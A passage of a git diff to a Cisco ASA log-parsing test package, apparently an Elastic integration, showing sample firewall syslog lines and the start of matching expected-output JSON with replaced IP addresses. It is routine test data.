10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index df86cbf5a52..749298a2f82 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -10,8 +10,8 @@ }, "destination": { "port": 8256, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1772, @@ -51,7 +51,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -59,8 +59,8 @@ }, 